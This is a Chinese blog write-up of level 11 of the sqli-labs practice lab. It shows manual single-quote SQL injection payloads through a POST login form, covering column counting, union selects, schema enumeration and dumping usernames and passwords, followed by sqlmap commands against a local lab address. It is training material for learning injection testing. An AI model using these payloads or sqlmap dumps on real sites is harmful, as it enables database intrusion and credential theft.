Less11基于post提交的单引号闭合的字符型注入

Less11基于post提交的单引号闭合的字符型注入

xKMKlXAnGKbZ3UKKFLNKSwoplaqrNR0vEzgOnmBKUiY

一、手工注入

1.判断注入点

判断注入类型是否为数字型
1 or 1=1
1 or 1=2

发现页面显示相同,因此不是数字型

USeI1uIkqU9oBrx3t55my2H0P8dwgNKdlVp2PMLDqTs

判断注入类型是否为字符型
1' or 1=1#
1' or 1=2#

发现1=2页面异常报错,1=1正常。所以是单引号字符型闭合。

X5nLL0F-N4dX6Jkff-ITZlReIrrECugzi5HBebopgP4

6EgYMbvUh70sCF3A1bUKgjL-stNSfYOx3vNd25UgWy0

2.爆破字段数

1' order by 3#

发现3时报错,说明字段数为2。

D7SWsuFvNlBxauzCNPwNsg5_kOQnEBeZlMP02iAWjo0

3.爆破显示位置

1' union select 1,2#

发现显示位为1和2

d9KeTozCTCytOr8kROQPwRwA3POH9VVbvZZ4fxhNY2k

4.爆破数据库名

1' union select user(),database()#

成功爆出数据库名为security,用户为root@localhost,版本号自己用version()查询就行了。

WLFEKxqVQojNToX101gxrDpPOP--2h_iLXZ-pCDQHnQ

5.爆破数据表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

D_26DEhO1vwXwN-FgRgBPPbD4BrDX2XIY2v7fouLgWk

6.爆破字段名

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"#

jd-iiMbQaZzaWeJ6hLrdaHmXieDhlbTklCt7BOTzskM

7.爆破值

1' union select group_concat(username),group_concat(password) from users #

zBgxZD7yaIf4iB8kXMXUEqo4gtc_8bkW6qmNMFP3nXc

二、SQLMap注入

由于11关是POST提交参数,所以需要添加--data参数

1.查看注入类型

sqlmap -u http://192.168.80.129/sqli-labs/Less-11/ --data="uname=admin&passwd=admin&submit=Submit"

Kcqe60t5hYcZr_YR7QAdYFpDsuoy0jpqBe4v3Ap2eOo

2.查看当前数据库

sqlmap -u http://192.168.80.129/sqli-labs/Less-11/ --data="uname=admin&passwd=admin&submit=Submit" -current-db

qbAm9mSU6W1c_5Y9UnDn65OjysFeEs8q6VUzCyT0LcI

3.查看表名

sqlmap -u http://192.168.80.129/sqli-labs/Less-11/ --data="uname=admin&passwd=admin&submit=Submit" -D security -tables

HpowF28r1W96grnx5qbxClUpsCs1YsimMB3rjp3rEtw

4.查看列名

sqlmap -u http://192.168.80.129/sqli-labs/Less-11/ --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -columns

XKsCNEMMnc_Ku6bMkI-ZP0Yp5aKKrsGSK8B4GAfHNQw

5.查看字段内容

sqlmap -u http://192.168.80.129/sqli-labs/Less-11/ --data="uname=admin&passwd=admin&submit=Submit" -D security -T users -C username,password --dump

x5zhA8rz4UEFo7cv0fgppHgi5c-CEU6qIAOuFfG1tfU

posted on   跳河离去的鱼  阅读(24)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示